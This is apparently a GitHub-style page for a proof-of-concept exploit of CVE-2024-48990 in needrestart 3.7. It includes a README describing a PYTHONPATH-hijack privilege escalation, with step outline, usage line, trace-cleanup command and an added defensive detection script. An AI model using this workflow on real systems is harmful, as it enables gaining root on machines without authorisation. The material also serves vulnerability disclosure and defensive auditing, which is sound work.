
CVE-2024-48990 PoC — needrestart security vulnerability

Associated Vulnerability
Title: needrestart security vulnerability (CVE-2024-48990)
Description: needrestart is a tool by the individual developer liske that checks which daemons need to be restarted after an upgrade. Versions of needrestart before 3.8 contain a security vulnerability: a local attacker can trick needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable and thereby execute arbitrary code as root.
Description
Automated local privilege escalation exploit for CVE-2024-48990 (needrestart v3.7), leveraging PYTHONPATH hijacking to gain root access.
Readme
# CVE-2024-48990 PYTHONPATH Hijack - Privilege Escalation Exploit

This tool automates the exploitation of a privilege escalation vulnerability in `needrestart` version 3.7, identified as **CVE-2024-48990**.  
It achieves root execution by leveraging the insecure use of the `PYTHONPATH` environment variable when `needrestart` scans Python processes.

## Summary

The exploit works by:

1. Compiling a malicious shared object (`__init__.so`) that is triggered on import.
2. Serving the `.so` via a local HTTP server.
3. Connecting to the target via SSH and preparing a malicious `PYTHONPATH` environment.
4. Launching a Python bait process that continuously imports `importlib`.
5. Running `needrestart`, which inherits the manipulated `PYTHONPATH`, loads the malicious module, and executes the payload as root.
6. The payload creates a SUID binary (`/tmp/poc`), allowing root shell access.
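The root cause above is a root-run interpreter honouring a `PYTHONPATH` taken from an unprivileged process's environment. The following defender-side checks are an added example, not code from the PoC repository: they flag an installed `needrestart` older than the fixed 3.8 release and audit a `/proc/<pid>/environ`-style blob for `PYTHONPATH` entries that no privileged interpreter should trust. The sample inputs, the `WRITABLE_PREFIXES` list and the function names are assumptions made for this example.

```python
"""Exposure checks for CVE-2024-48990 (added example, not the PoC's own code)."""
import re

FIXED_VERSION = (3, 8)  # the page states needrestart before 3.8 is affected
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed untrusted dirs

# Constructed sample inputs standing in for `needrestart --version` output and
# the contents of /proc/<pid>/environ on a host under audit.
SAMPLE_VERSION = "needrestart 3.7"
SAMPLE_ENVIRON = b"HOME=/home/bob\0PYTHONPATH=/tmp/malicious\0LANG=C\0"


def parse_version(text: str) -> tuple:
    """Return the first major.minor pair found in a version banner or dpkg line."""
    m = re.search(r"(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError(f"no version number in {text!r}")
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_version(text: str) -> bool:
    """True when the installed needrestart predates the fixed release."""
    return parse_version(text) < FIXED_VERSION


def untrusted_pythonpath(environ_blob: bytes) -> list:
    """Parse a NUL-separated environ blob and return PYTHONPATH entries that a
    root-run interpreter must never honour: an empty entry (current directory),
    a relative path, or a path under a world-writable directory."""
    bad = []
    for item in environ_blob.split(b"\0"):
        if not item.startswith(b"PYTHONPATH="):
            continue
        value = item[len(b"PYTHONPATH="):].decode(errors="replace")
        for entry in value.split(":"):
            if entry == "" or not entry.startswith("/"):
                bad.append(entry)
            elif entry.startswith(WRITABLE_PREFIXES) or entry.rstrip("/") + "/" in WRITABLE_PREFIXES:
                bad.append(entry)
    return bad


def assess(version_text: str, environ_blob: bytes) -> dict:
    """Combine both checks into one report for a host."""
    return {
        "vulnerable_version": is_vulnerable_version(version_text),
        "untrusted_pythonpath": untrusted_pythonpath(environ_blob),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_VERSION, SAMPLE_ENVIRON))
```

On a real host, `untrusted_pythonpath` would be run over every readable `/proc/<pid>/environ`, since the scan in needrestart is triggered by other users' processes rather than by root's own environment.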

## Usage

Run the exploit from your attacker machine:

    python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>

Parameters:

- `--user` SSH username on the target
- `--host` Target IP address
- `--att-ip` Attacker IP (used for hosting the payload)
- `--ssh-pass` SSH password (omit if using SSH keys)
- `--http-port` Optional HTTP port (default: 8000)

## CVE

- **CVE ID:** [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)
- **Affected Software:** `needrestart` version 3.7
- **Vulnerability Type:** Insecure environment variable handling
- **Impact:** Local privilege escalation to root

## Cleanup

To remove exploit traces from the target:

    rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh

## Requirements

### Attacker machine:
- Python 3
- `pexpect` (`pip3 install pexpect`)
- `gcc` (for compiling the payload)
- Open SSH access to the target
- `python3 -m http.server` (automatically started by the script)

### Target machine:
- A vulnerable version of `needrestart` (v3.7)
- A non-root user with `sudo` NOPASSWD rights for `/usr/sbin/needrestart`
- Python 3 and `curl` installed

## Disclaimer

This tool is provided for educational and authorized security testing purposes only.
Do not use it on systems you do not own or without explicit permission.
File Snapshot

    [4.0K] /data/pocs/4e67781a5c3c59dafd3a83461fb54c9d6a9b0923
    ├── [4.3K] exploit.py
    ├── [1.0K] LICENSE
    └── [2.2K] README.md

    1 directory, 3 files